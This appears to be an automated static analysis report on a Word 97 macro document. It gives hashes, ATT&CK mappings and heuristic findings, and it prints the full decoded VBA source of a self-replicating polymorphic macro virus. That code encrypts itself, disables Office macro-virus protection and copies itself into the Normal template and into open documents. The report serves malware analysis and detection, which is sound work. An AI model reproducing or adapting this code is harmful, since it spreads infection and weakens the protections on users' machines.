Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 7d3133fdddedefb3…

MALICIOUS

Office (OLE) / .DOC

Size: 38.0 KB
Created: 2001-10-27 23:04:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 8162cde86e8bc78b1db748e865a07582
SHA-1: cb78f8b95a7a6352bfb9a35b30fbf3d79fbdea75
SHA-256: 7d3133fdddedefb371961c3a245f6ed3512c779036a0291170e602bd8a5710b8
Risk Score: 80

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1542.001 System Initialization: Boot or Logon Autostart Execution

The sample is a Microsoft Word document containing VBA macros. Heuristics indicate that these macros are designed for self-replication and tampering with Office macro protection, suggesting a malicious intent to spread and evade security measures. The script actively rewrites its own code, making it difficult to analyze and potentially establishing persistence.

Heuristics 2

  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering (severity: critical; rule: OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine ZSZPE1, ZSZPE8

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 23599 bytes
SHA-256: 901b6710fc0bef12e94b6ddfbb83c1731daa76acc5129616691bfb3bf5d2b8ea
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Encrypt a virus:
' ~~~~~~~~~~~~~~~~

Private Sub Document_Close()
Options.SaveNormalPrompt = False
Application.EnableCancelKey = wdCancelDisabled
On Error Resume Next    ' junk
For ZSZPE1 = 34 To 106
Application.ActiveWindow.Activate
ZSZPE2 = Null
Options.CreateBackup = True
ZSZPE3 = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(ZSZPE1, 1))
Options.CreateBackup = True
ZSZPE4 = Asc((Mid(ZSZPE3, 2, 1)))
Options.SaveNormalPrompt = False
ZSZPE5 = ZSZPE4 Xor 39
Randomize
For ZSZPE6 = 3 To Len(ZSZPE3)
Options.SaveNormalPrompt = False
ZSZPE7 = Asc(Mid(ZSZPE3, ZSZPE6, 1)) Xor ZSZPE5
Options.InsertedTextColor = wdAuto
ZSZPE2 = ZSZPE2 & Chr(ZSZPE7)
Options.SaveNormalPrompt = False
Next ZSZPE6
Randomize
ZSZPE8 = ZSZPE2
If VT = 39 Then JY = 2
ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine ZSZPE1, ZSZPE8
Options.BackgroundSave = True
Next ZSZPE1
If NT = 21 Then BO = 13
Call ZSZPE
Application.ActiveWindow.Activate
End Sub
'Zd0B SHi ZduB p0LyM0RHiC ENGiNe By ULTRAS/MATRiX
Private Sub ZSZPE()
' Hwsnhit)DubfsbEfdlrw':'Surb
'&Gns!y{!<!3!Un!017!Rudq!3
'"Juqljkv+Fw`dq`Gdfnpu%8%Qwp`
'/f}e(5(Af| Zfl("(1!(#(9
'#Ktpmkjw*Mjwavpa`Pa|pGkhkv$9$s`Eqpk
'!O`&hsk&;&7&Rnch&|ik"&;&$Tghbiko|c$
'"Juqljkv+Lkv`wq`aQ`}qFjijw%8%raDpqj
'"Lc%kph%8%7%Qm`k% jh!%8%'Dfqls`Ajfph`kq+Vds`'
'#Etthmgepmkj*EgpmraSmj`ks*Egpmrepa
'$Je#mvn#>#0#Wkfm#yln'#>#!Lswjlmp-@qfbwfAb`hvs#>#Wqvf!
'#Ktpmkjw*Fegocvkqj`Wera$9$Pvqa
'$Je#mvn#>#7#Wkfm#yln'#>#!Je#!#%#@kq+Jmw+Qmg#)#16*#(#56*#%#@kq+Jmw+Qmg#)#16*#(#56*#%#!#>#!#%#@Pwq+Jmw+Qmg#)#76**#%#!Wkfm#!#%#@kq+Jmw+Qmg#)#16*#(#56*#%#@kq+Jmw+Qmg#)#16*#(#56*#%#!#>#!#%#@Pwq+Jmw+Qmg#)#76**
'&Nquhnor/C`bjfsntoeR`wd!<!Ustd
'%Kd"lwo"?"7"Vjgl"xmo&"?" Ml"Gppmp"Pgqwog"Lgzv
'/Gx|agf{&Kzmi|mJikc}x(5(\z}m
'&Hg!otl!<!7!Uido!{nl%!<!#@qqmhb`uhno/@buhwdVhoenv/@buhw`ud#
'#Ktpmkjw*WeraJkviehTvkitp$9$Behwa
'$Je#mvn#>#4#Wkfm#yln'#>#!Lswjlmp-PbufMlqnboSqlnsw#>#Ebopf!
'#Ktpmkjw*Fegocvkqj`Wera$9$Pvqa
'%Kd"lwo"?":"Vjgl"xmo&"?" Mrvkmlq,KlqgpvgfVgzvAmnmp"?"ufCwvm
'#Ktpmkjw*GvaepaFegoqt$9$Pvqa
'$Je#mvn#>#:#Wkfm#yln'#>#!Lswjlmp-Ab`hdqlvmgPbuf#>#Wqvf!
'!Ih&Cttit&Tcuskc&Hc~r
'"QmlvAjfph`kq+SGUwjo`fq+SGFjhujk`kqv+Lq`h-4,+Fja`Hjapi`+W`uidf`Ilk`%} )% jh!
'%Pclfmokxg
'/Fmp|(pr
'!Ivroihu(DgematishbUgpc&;&Rtsc
'"QmlvAjfph`kq+SGUwjo`fq+SGFjhujk`kqv+Lq`h-4,+Fja`Hjapi`+W`uidf`Ilk`%67)%'"_a5G%VMl%_apG%u5I|H5WMlF%@KBlK`%G|%PIQWDV*HDQWl]'
'#Ktpmkjw*WeraJkviehTvkitp$9$Behwa
'&Gns![R[QD0!<!25!Un!017
' Ufichjn}b
'#^W^TA6$9$Jqhh
' Fwwkndfsnhi)FdsnqbPnichp)Fdsnqfsb
'"_V_U@6%8%'"'%#%-QmlvAjfph`kq+SGUwjo`fq+SGFjhujk`kqv+Lq`h-4,+Fja`Hjapi`+Ilk`v-_V_U@4)%4,,
' Ufichjn}b
'&[R[QD5!<!Hou)Soe)(!+!9(!*!0
'%Pclfmokxg
'&Gns![R[QD4!<!0!Un!Mdo)[R[QD2(
'&Nquhnor/HordsudeUdyuBnmns!<!ve@tun
'$YPYSF5#>#Bp`+Njg+YPYSF0/#YPYSF6/#2**#[lq#YPYSF7
'%Mrvkmlq,Apgcvg@caiwr"?"Vpwg
'&[R[QD3!<![R[QD3!'!Bis)[R[QD7(
'"Wdkajhl `
'!Hc~r&\U\VC3
'"Juqljkv+Fw`dq`Gdfnpu%8%Qwp`
' ]T]WB0':']T]WB5
'&Hg!IY!<!03!Uido!XJ!<!6
'%VjkqFmawoglv,T@Rpmhgav,T@Amormlglvq,Kvgo*3+,AmfgOmfwng,PgrncagNklg"XQXRG3." % "$"XQXRG5
'!GeropcBieskchr(Ugpc
'#Ja|p$^W^TA5
'$Bssoj`bwjlm-B`wjufTjmglt-B`wjubwf
'%Mrvkmlq,TkpwqRpmvgavkml"?"Dcnqg
'!O`&MT&;&?&Rnch&OV&;&>
'/Gx|agf{&[i~mFgzeidXzgex|(5(Nid{m
'"Duuilfdqljk+Dfqls`Rlkajr+Dfqlsdq`
'&Nquhnor/BnoghslBnowdsrhnor!<!G`mrd
' Ufichjn}b
'#P@$9$Plmw@kgqiajp*RFTvknagp*RFGkitkjajpw*Mpai,5-*Gk`aIk`qha*Hmjaw,5($Plmw@kgqiajp*RFTvknagp*RFGkitkjajpw*Mpai,5-*Gk`aIk`qha*GkqjpKbHmjaw-
'#Kj$Avvkv$Vawqia$Ja|p
'#Wap$JP$9$JkviehPaithepa*RFTvknagp*RFGkitkjajpw*Mpai,5-*Gk`aIk`qha
'%Mrvkmlq,@caiepmwlfQctg"?"Vpwg
'$MW-GfofwfOjmfp#2/#MW-@lvmwLeOjmfp
'&Nquhnor/Bsd`udC`bjtq!<!Ustd
'"KQ+DaaCwjhVqwlkb%QA
'%Mrvkmlq,KlqgpvgfVgzvAmnmp"?"ufCwvm
'/[m|(^I(5(Ik|a~mLgk}emf|&^JXzgbmk|&^JKgexgfmf|{&A|me 9!&KglmEgl}dm
'&Hg!IV!<!08!Uido!QQ!<!5
'#RE*@ahapaHmjaw$5($RE*GkqjpKbHmjaw
'$Bssoj`bwjlm-B`wjufTjmglt-B`wjubwf
' QF)FccAuhjTsuni`'SC
' Hwsnhit)TfqbIhujfkWuhjws':'Afktb
'$B`wjufGl`vnfmw-PbufBp#EjofMbnf9>B`wjufGl`vnfmw-EvooMbnf
'!Ivroihu(DgematishbUgpc&;&Rtsc
End Sub


'Not Encrypt a virus:
'~~~~~~~~~~~~~~~~~~~~
 
Private Sub Document_Close()

Application.EnableCancelKey = wdCancelDisabled

For ZSZPE1 = 34 To 106

ZSZPE2 = Null

ZSZPE3 = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(ZSZPE1, 1))

ZSZPE4 = Asc((Mid(ZSZPE3, 2, 1)))

ZSZPE5 = ZSZPE4 Xor 39

For ZSZPE6 = 3 To Len(ZSZPE3)

ZSZPE7 = Asc(Mid(ZSZPE3, ZSZPE6, 1)) Xor ZSZPE5

ZSZPE2 = ZSZPE2 & Chr(ZSZPE7)

Next ZSZPE6

ZSZPE8 = ZSZPE2

ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine ZSZPE1, ZSZPE8

Next ZSZPE1

Call ZSZPE

End Sub

Private Sub ZSZPE()

For xz = 2 To 106 Step 2

num = Int(Rnd * 9) + 1

If num = 1 Then zom$ = "Randomize"

If num = 2 Then zom$ = "ActiveDocument.Save"

If num = 3 Then zom$ = "Options.CreateBackup = True"

If num = 4 Then zom$ = "If " & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & CStr(Int(Rnd * 45)) & "Then " & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & CStr(Int(Rnd * 45))

If num = 5 Then zom$ = "On Error Resume Next"

If num = 6 Then zom$ = "Application.ActiveWindow.Activate"

If num = 7 Then zom$ = "Options.SaveNormalPrompt = False"

If num = 8 Then zom$ = "Options.InsertedTextColor = wdAuto"

If num = 9 Then zom$ = "Options.BackgroundSave = True"

ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine xz, zom$

Next xz

ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 32, "'Zd0B SHi ZduB p0LyM0RHiC ENGiNe By ULTRAS/MATRiX"

For ZSZPE1 = 34 To 106

ZSZPE2 = Null

ZSZPE3 = "'" & (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(ZSZPE1, 1))

ZSZPE4 = Int(Rnd() * 8) + 1

For ZSZPE5 = 1 To Len(ZSZPE3)

ZSZPE6 = Asc(Mid(ZSZPE3, ZSZPE5, 1)) Xor ZSZPE4

ZSZPE2 = ZSZPE2 & Chr(ZSZPE6)

Next ZSZPE5

ZSZPE7 = ZSZPE2

ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine ZSZPE1, "'" & ZSZPE7

Next ZSZPE1

Options.VirusProtection = False

Options.SaveNormalPrompt = False

Options.ConfirmConversions = False

TD = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)

Set NT = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule

NT.DeleteLines 1, NT.CountOfLines

NT.AddFromString TD

Set VA = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule

VA.DeleteLines 1, VA.CountOfLines

VA.AddFromString TD

ActiveDocument.SaveAs FileName:=ActiveDocument.FullName

End Sub

' Processing file: /tmp/tmpl6v6lpam
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 13680 bytes
…